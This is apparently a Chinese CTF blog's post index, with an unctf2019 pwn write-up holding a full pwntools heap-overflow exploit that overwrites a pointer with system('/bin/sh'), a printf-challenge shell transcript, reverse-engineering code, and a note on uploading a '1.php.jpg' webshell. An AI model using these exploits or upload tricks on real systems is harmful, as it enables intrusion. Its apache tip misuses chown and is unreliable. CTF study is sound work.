0%

Posted on Edited on In Views: Valine:
Symbols count in article: 34k Reading time ≈ 31 mins.

unctf2019 pwn部分题解

babyheap

easy,不讲了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *

local = 1
host = '127.0.0.1' 
port = 10000
context.log_level = 'debug'
exe = '/tmp/tmp.spk5nTEvta/1910245db1406d3eedd'
context.binary = exe
elf = ELF(exe)
libc = elf.libc


#don't forget to change it
if local:
    io = process(exe)
else:
    io = remote(host,port)

s    = lambda data            : io.send(str(data))
sa   = lambda delim,data      : io.sendafter(str(delim), str(data))
sl   = lambda data            : io.sendline(str(data))
sla  = lambda delim,data      : io.sendlineafter(str(delim), str(data))
r    = lambda numb=4096       : io.recv(numb)
ru   = lambda delim,drop=True : io.recvuntil(delim, drop)

uu32 = lambda data            : u32(data.ljust(4, '\x00'))
uu64 = lambda data            : u64(data.ljust(8, '\x00'))
lg   = lambda name,data       : io.success(name + ": 0x%x" % data)

# break on aim addr
def debug(addr,PIE=True):
    if PIE:
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(io.pid)).readlines()[1], 16)
        gdb.attach(io,'b *{}'.format(hex(text_base+addr)))
    else:
        gdb.attach(io,"b *{}".format(hex(addr)))


#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================

# Arch:     amd64-64-little
# RELRO:    Full RELRO
# Stack:    Canary found
# NX:       NX enabled
# PIE:      No PIE (0x400000)

def c(idx):
    sla("Your choice: ", str(idx))

def new(content):
    c(1)
    sa("Plz input content: ", content)

def edit(idx, size, content):
    c(2)
    sla("Plz input index: ", str(idx))
    sla("Plz input size: ", str(size))
    sa("Plz input content: ", content)

def show(idx):
    c(3)
    sla("Plz input index: ", str(idx))

def free(idx):
    c(4)
    sla("Plz input index: ", str(idx))


def exp():
    new("a"*0x10)
    edit(0, 0x18, "a"*0x18)
    show(0)
    r(0x18)
    puts = uu64(r(6))
    lg("addr", puts)
    libc.address = puts - libc.symbols['puts']
    new("a"*0x10)
    payload = "/bin/sh;#\x00"
    payload = payload.ljust(0x18, "a")
    payload += p64(libc.symbols['system'])
    edit(1, 0x20, payload)
    show(1)



    #free(0)

if __name__ == '__main__':
    exp()
    io.interactive()
Read more »

Posted on Edited on In , , Views: Valine:
Symbols count in article: 3.9k Reading time ≈ 4 mins.

obs_pwn

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
└──╼ $obs 
Attempted path: share/obs/obs-studio/locale/en-US.ini
Attempted path: /usr/share/obs/obs-studio/locale/en-US.ini
Attempted path: share/obs/obs-studio/locale.ini
Attempted path: /usr/share/obs/obs-studio/locale.ini
Attempted path: share/obs/obs-studio/themes/Dark.qss
Attempted path: /usr/share/obs/obs-studio/themes/Dark.qss
info: CPU Name: Intel(R) Core(TM) i7-7500U CPU @ 2.70GHz
info: CPU Speed: 3480.843MHz
info: Physical Cores: 2, Logical Cores: 4
info: Physical Memory: 11782MB Total, 3611MB Free
info: Kernel Version: Linux 5.2.0-2parrot1-amd64
info: Distribution: "Parrot GNU/Linux" "4.7"
info: Window System: X11.0, Vendor: The X.Org Foundation, Version: 1.20.4
info: Portable mode: false
Attempted path: share/obs/obs-studio/themes/Dark/no_sources.svg
Attempted path: /usr/share/obs/obs-studio/themes/Dark/no_sources.svg
QMetaObject::connectSlotsByName: No matching signal for on_advAudioProps_clicked()
QMetaObject::connectSlotsByName: No matching signal for on_advAudioProps_destroyed()
QMetaObject::connectSlotsByName: No matching signal for on_program_customContextMenuRequested(QPoint)
info: OBS 0.0.1 (linux)
info: ---------------------------------
info: ---------------------------------
info: audio settings reset:
	samples per sec: 44100
	speakers:        2
info: ---------------------------------
info: Initializing OpenGL...
info: Loading up OpenGL on adapter Intel Open Source Technology Center Mesa DRI Intel(R) HD Graphics 620 (Kaby Lake GT2) 
info: OpenGL loaded successfully, version 4.5 (Core Profile) Mesa 19.1.6, shading language 4.50
info: ---------------------------------
info: video settings reset:
	base resolution:   1920x1080
	output resolution: 1280x720
	downscale filter:  Bicubic
	fps:               30/1
	format:            NV12
	YUV mode:          601/Partial
info: NV12 texture support not available
info: Audio monitoring device:
	name: Default
	id: default
info: ---------------------------------
warning: Failed to load 'en-US' text for module: 'decklink-ouput-ui.so'
libDeckLinkAPI.so: cannot open shared object file: No such file or directory
info: No blackmagic support
info: FFMPEG VAAPI supported
info: VLC found, VLC video source enabled
info: ---------------------------------
info:   Loaded Modules:
info:     vlc-video.so
info:     text-freetype2.so
info:     rtmp-services.so
info:     obs-x264.so
info:     obs-transitions.so
info:     obs-outputs.so
info:     obs-filters.so
info:     obs-ffmpeg.so
info:     linux-v4l2.so
info:     linux-pulseaudio.so
info:     linux-jack.so
info:     linux-decklink.so
info:     linux-capture.so
info:     linux-alsa.so
info:     image-source.so
info:     frontend-tools.so
info:     decklink-ouput-ui.so
info: ---------------------------------
info: ==== Startup complete ===============================================
error: Service '' not found
info: No scene file found, creating default scene
info: All scene data cleared
info: ------------------------------------------------
info: pulse-input: Server name: 'pulseaudio 13.0'
info: pulse-input: Audio format: s16le, 44100 Hz, 2 channels
info: pulse-input: Started recording from 'alsa_output.pci-0000_00_1f.3.analog-stereo.monitor'
info: pulse-input: Server name: 'pulseaudio 13.0'
info: pulse-input: Audio format: s16le, 44100 Hz, 2 channels
info: pulse-input: Started recording from 'alsa_input.pci-0000_00_1f.3.analog-stereo'
info: Switched to scene 'Scene'
warning: Failed to glob scene collections
Attempted path: share/obs/obs-studio/images/overflow.png
Attempted path: /usr/share/obs/obs-studio/images/overflow.png
info: adding 23 milliseconds of audio buffering, total audio buffering is now 23 milliseconds (source: Mic/Aux)

^Cinfo: ==== Shutting down ==================================================
info: Switched to scene '(null)'
info: pulse-input: Stopped recording from 'alsa_output.pci-0000_00_1f.3.analog-stereo.monitor'
info: pulse-input: Got 125 packets with 32338 frames
info: pulse-input: Stopped recording from 'alsa_input.pci-0000_00_1f.3.analog-stereo'
info: pulse-input: Got 271 packets with 118520 frames
info: All scene data cleared
info: ------------------------------------------------
double free or corruption (out)
Aborted
Read more »

Posted on Edited on In Views: Valine:
Symbols count in article: 1.4k Reading time ≈ 1 mins.
此文章已被加密,需要输入密码访问。
Read more »

Posted on Edited on In Views: Valine:
Symbols count in article: 450 Reading time ≈ 1 mins.

Printf

Welcome to the brand new Security Consultants Inc. portal!
What would you like to do?
1.) View the Team!
2.) Check the date.
3.) Sign up for our newsletter!
4.) Report a bug.
x.) Exit.
Thanks for signing up for our newsletter!
Please enter your email address below:
I have your email as:
sh;# � �aaaaaaaJ `sh: 1: Is: not found
$
Great! I have your information down as:
Name: Evan Shi
sh: 1: Email:: not found
$ cat flag.txt
tjctf{p0lygl0t_m0r3_l1k3_p0lynot}$

Read more »

Posted on Edited on In , , Views: Valine:
Symbols count in article: 2k Reading time ≈ 2 mins.

进制

  1. 进制的实质就是查表
  2. 熟悉2进制跟16进制的转换
  3. 熟悉进制表的制作以及计算进制之间的加减乘除

进制练习1

通过编写7进制加法表,乘法表,并计算
23456+54356 = ?
5621 - 654 = ?
234 * 65 = ?

首先编写1-100的7进制数据

0123456
10111213141516
20212223242526
30313233343536
40414243444546
50515253545556
60616263646566
Read more »

Posted on Edited on In , Views: Valine:
Symbols count in article: 147 Reading time ≈ 1 mins.

apache2

apache2配置静态资源访问

需要将目录设置用户设置为www-data

1
chown 755 -R 文件目录

将目录文件设置为可执行

1
chmod 775 文件目录

本文作者:NoOne
本文地址https://noonegroup.xyz/posts/8c46c3ca/
版权声明:转载请注明出处!

Posted on Edited on In Views: Valine:
Symbols count in article: 2.4k Reading time ≈ 2 mins.

writeup-1-练习

简单的re

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v3; // edi
  unsigned __int64 i; // rsi
  int *v5; // rdx
  int v6; // ecx
  unsigned int v7; // eax
  __int64 v8; // rdx
  __int64 v10; // [rsp+0h] [rbp-78h]
  int v11; // [rsp+60h] [rbp-18h]
  unsigned __int64 v12; // [rsp+68h] [rbp-10h]

  v12 = __readfsqword(0x28u);
  _printf_chk(1LL, "input:", envp);
  memset(&v10, 0, 0x60uLL);
  v11 = 0;
  scanf("%s", &v10);
  v3 = 34;
  for ( i = 0LL; ; ++i )
  {
    v5 = (int *)&v10;
    do
    {
      v6 = *v5;
      ++v5;
      v7 = ~v6 & (v6 - 16843009) & 0x80808080;
    }
    while ( !v7 );
    if ( !(~v6 & (v6 - 16843009) & 0x8080) )
      v7 >>= 16;
    if ( !(~v6 & (v6 - 16843009) & 0x8080) )
      v5 = (int *)((char *)v5 + 2);
    if ( i >= (char *)v5 - __CFADD__((_BYTE)v7, (_BYTE)v7) - 3 - (char *)&v10 )
      break;
    *((_BYTE *)&v10 + i) ^= v3++;
  }
  if ( !memcmp(&szCmp, &v10, 0x16uLL) )
    _printf_chk(1LL, "right\n", v8);
  else
    _printf_chk(1LL, "wrong\n", v8);
  return 0;
}
Read more »

Posted on Edited on In , Views: Valine:
Symbols count in article: 175 Reading time ≈ 1 mins.

burp无法抓取本地

解决方案:将ip改成他本来的ip

比如我docker搭建的题目,我进入docker ifconfig

查看到的ip是172.17.0.6

我就访问172.17.0.6,不访问127.0.0.1就可以抓到包了

本文作者:NoOne
本文地址https://noonegroup.xyz/posts/ea225533/
版权声明:转载请注明出处!

Posted on Edited on In , Views: Valine:
Symbols count in article: 3k Reading time ≈ 3 mins.

爬虫第一天

关于内容的思考

书里有两处遗漏

  1. 正则匹配不当

    1
    link_craw('http://example.python-scraping.com', '/places/default/(index|view)',user_agent='BadCrawler')

    这里应该是/place/default/这样的格式,因为re.match只匹配开头串,前面重复的部分也要写上

  2. 在requests这里讲解的时候代码少了个return html

Read more »

Posted on Edited on In Views: Valine:
Symbols count in article: 918 Reading time ≈ 1 mins.

比赛

1

比比手速 靶机地址:101.71.29.5:10065

burp抓包可知密码
然后文件上传,1.php.jpg
连接小马

2

https://blog.zeddyu.info/2019/02/24/%E5%AE%89%E6%81%921%E6%9C%88%E6%9C%88%E8%B5%9B/

3

https://blog.csdn.net/u011377996/article/details/83867976

Read more »